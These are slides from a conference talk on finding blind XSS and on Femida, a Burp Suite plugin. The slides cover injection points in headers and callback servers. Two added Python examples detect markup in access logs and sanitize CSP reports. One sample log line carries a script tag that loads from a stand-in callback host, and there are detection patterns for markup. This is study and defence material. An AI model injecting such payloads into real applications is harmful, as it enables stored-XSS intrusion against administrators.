BLIND XSS & FEMIDA
ZeroNights
Pavel Rukavishnikov
HD
whoami
Pavel Rukavishnikov
• CTF player
• Programmer
Github: https://github.com/wish-i-was
Twitter: https://twitter.com/wish_iwas
HD
• Script kiddie
• Bounty hunter
• Pentester
Github: https://github.com/HD421
Twitter: https://twitter.com/hd_421
Agenda
• What is blind XSS?
• How to deal with it
• Where to inject
• Callback handlers
• How to improve and automate
• TODO
A few facts about blind XSS
• Almost always it’s stored
• You can’t see alert(1337)
• It needs your patience
• You approach it from the other side: you wait for the payload to call back
Where to inject
Headers:
• User-Agent
• Referer
• Origin
• X-Forwarded-For
Request parameters:
• imagination
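The headers listed above end up in access logs and in the admin log viewers that render them, which is where a stored payload eventually fires. As an added example (not from the talk or the Femida plugin), here is a small Python detector that scans combined-format access log lines for markup in the Referer and User-Agent fields; the log lines and the callback.invalid host are constructed for the demo.

```python
import re
from typing import List, Optional, Tuple

# Combined log format: the quoted Referer and User-Agent fields are exactly the
# headers the talk names as landing spots, and they are what a log viewer renders.
LOG_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Fragments that do not belong in a Referer or User-Agent. A hit is a triage
# signal for a stored/blind XSS attempt, not proof of a vulnerability.
MARKUP_RE = re.compile(r"<\s*/?[a-z]+|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)


def scan_log_line(line: str) -> Optional[Tuple[str, List[str]]]:
    """Return (client_ip, [suspicious fields]) for one line, or None if it does not parse."""
    m = LOG_LINE_RE.match(line)
    if not m:
        return None
    flagged = [field for field in ("referer", "ua") if MARKUP_RE.search(m.group(field))]
    return m.group("ip"), flagged


def scan_log(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Lines whose Referer or User-Agent carries markup, reported with the client IP."""
    results = []
    for line in lines:
        parsed = scan_log_line(line)
        if parsed and parsed[1]:
            results.append(parsed)
    return results


# Constructed sample log lines (not real traffic): two benign, one carrying markup.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 612 "https://example.com/" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /login HTTP/1.1" 200 1024 "-" "curl/8.0.1"',
    '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /api HTTP/1.1" 200 17 "-" "<script src=//callback.invalid/></script>"',
]

if __name__ == "__main__":
    for ip, fields in scan_log(SAMPLE_LOG):
        print(f"{ip}: markup in {', '.join(fields)}")
```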
Ground control
Your target is to receive a knock-knock from an application used by an administrator or team member.
[Diagram: payloads sent to the application]
A few more
[Diagram: more payloads]
CSP report
How it sometimes looks
• The report request is almost always static (except for custom CSP reporting frameworks such as Sentry CSP)
• The servers that process the reports are often poorly protected
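Because the report body is fully client-controlled and the processing server is what later renders it to an operator, the defence has to live in the report processor. As an added example (not from the talk), here is a Python validator for a report-uri JSON body that keeps only known csp-report fields, enforces types and lengths, and HTML-escapes values before they reach an operator's browser; the sample report and the 2048-character cap are constructed for the demo.

```python
import html
import json
from typing import Dict

# Keys of the "csp-report" object (CSP Level 2 report-uri format) that a
# processing server typically stores and later shows to its operators.
ALLOWED_FIELDS = (
    "document-uri", "referrer", "blocked-uri", "violated-directive",
    "effective-directive", "original-policy", "script-sample", "source-file",
    "line-number", "column-number", "status-code", "disposition",
)
MAX_FIELD_LEN = 2048  # cap chosen for this example, not a value from the spec


class InvalidReport(ValueError):
    """Raised for bodies that are not a well-formed csp-report."""


def parse_csp_report(body: bytes) -> Dict[str, str]:
    """Return only the whitelisted fields of a report body, each as a bounded string."""
    try:
        doc = json.loads(body.decode("utf-8"))
    except (UnicodeDecodeError, ValueError) as exc:
        raise InvalidReport(f"body is not UTF-8 JSON: {exc}") from None
    report = doc.get("csp-report") if isinstance(doc, dict) else None
    if not isinstance(report, dict):
        raise InvalidReport("missing csp-report object")
    clean: Dict[str, str] = {}
    for key in ALLOWED_FIELDS:
        if key not in report:
            continue
        value = report[key]
        # Browsers send strings and small integers here; anything else is rejected.
        if isinstance(value, bool) or not isinstance(value, (str, int)):
            raise InvalidReport(f"unexpected type for {key}")
        clean[key] = str(value)[:MAX_FIELD_LEN]
    return clean


def render_report_row(report: Dict[str, str]) -> str:
    """Table row for the operator UI; every value is escaped, so stored markup stays inert."""
    cells = "".join(f"<td>{html.escape(report.get(k, ''), quote=True)}</td>" for k in ALLOWED_FIELDS)
    return f"<tr>{cells}</tr>"


# Constructed sample: blocked-uri carries markup and an unknown key is present.
SAMPLE_REPORT = json.dumps({"csp-report": {
    "document-uri": "https://example.com/page",
    "violated-directive": "script-src 'self'",
    "blocked-uri": "<script>alert(1337)</script>",
    "line-number": 12,
    "ignored-field": "not stored",
}}).encode("utf-8")
```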
Should I look for it?
Callback handlers
Callback token
• SSRF
• XXE
• XSS
https://github.com/jobertabma/ground-control
Callback handlers
Launch your own Collaborator Server:
https://blog.fabiopires.pt/running-your-instance-of-burp-collaborator-server/
What can be simplified?
The daily routine looks like this:
1. Intercept the request
2. Put the payload in the right header/parameter
3. Send the request
4. Repeat n times, because you never know what will be logged at the backend
Should we perform the manual check all the time?
[Figure: Automated vs. Manual]
FEMIDA
Who is Femida?
A Burp Suite plugin that:
• Is flexible and easy to configure
• Performs accurate passive checks
• Supports active scanning
FEMIDA
PLUGIN DEMO HERE
TODO
• CSP report detector and request generator
• WAF detector
• Etc…
We wish you happy hacking
Thank you for your attention
Feel free to ask your questions:
Twitter:
• https://twitter.com/hd_421
• https://twitter.com/wish_iwas
Plugin: https://github.com/wish-i-was/femida